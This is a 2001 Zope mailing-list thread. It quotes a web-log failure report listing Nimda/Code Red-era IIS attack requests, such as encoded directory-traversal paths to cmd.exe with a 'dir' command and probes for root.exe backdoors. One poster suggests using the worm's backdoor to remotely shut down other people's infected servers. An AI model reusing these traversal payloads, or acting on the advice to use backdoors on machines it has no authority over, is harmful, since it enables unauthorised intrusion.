From Z2.log and Analog (http://www.analog.cx) BZ At 2:08 PM -0700 9/20/01, Michael Montagne wrote:
How do you get that log from Zope?
On Thu, Sep 20, 2001 at 08:30:33PM +0000, Reinoud van Leeuwen wrote:
On 20 Sep 2001 18:28:43 -0000, you wrote:
Failure Report (9/19/2001 - 24 hour report) Listing the top 30 files by the number of failed requests, sorted by the number of failed requests.
reqs: file ----: ---- 1210: /scripts/..%255c../winnt/system32/cmd.exe 1210: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 1204: /scripts/..%5c../winnt/system32/cmd.exe 1204: /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 615: /scripts/root.exe 615: /scripts/root.exe?/c+dir 611: /MSADC/root.exe 611: /MSADC/root.exe?/c+dir 610: /c/winnt/system32/cmd.exe 610: /c/winnt/system32/cmd.exe?/c+dir 609: /d/winnt/system32/cmd.exe 609: /d/winnt/system32/cmd.exe?/c+dir 608: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 608: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 606: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe 606: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 604: /scripts/..%c1%1c../winnt/system32/cmd.exe 604: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 604: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe 604: /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 603: /scripts/..%c0%af../winnt/system32/cmd.exe 603: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 603: /scripts/winnt/system32/cmd.exe 603: /scripts/winnt/system32/cmd.exe?/c+dir 602: /scripts/..%c1%9c../winnt/system32/cmd.exe 602: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 598: /scripts/..%252f../winnt/system32/cmd.exe 598: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
That is a lot of requests! Glad Zope could handle it.
You can "help" your infected neigbours by remotely turning their infected servers off! see http://pc.xs4all.nl/default.ida
(it is a Perl script that uses the same backdoor as the virus itself. I've not yet installed perl in Zope, but am working on it ";-)
-- __________________________________________________ "Nothing is as subjective as reality" Reinoud van Leeuwen reinoud@xs4all.nl http://www.xs4all.nl/~reinoud -> when replying to a mailinglist mail, please do <- -> *NOT* cc: me as well. If I read the list I will <- -> receive the reply as well! <- __________________________________________________
_______________________________________________ Zope maillist - Zope@zope.org http://lists.zope.org/mailman/listinfo/zope ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope-dev )
-- Michael Montagne montagne@boora.com http://www.boora.com
_______________________________________________ Zope maillist - Zope@zope.org http://lists.zope.org/mailman/listinfo/zope ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope-dev )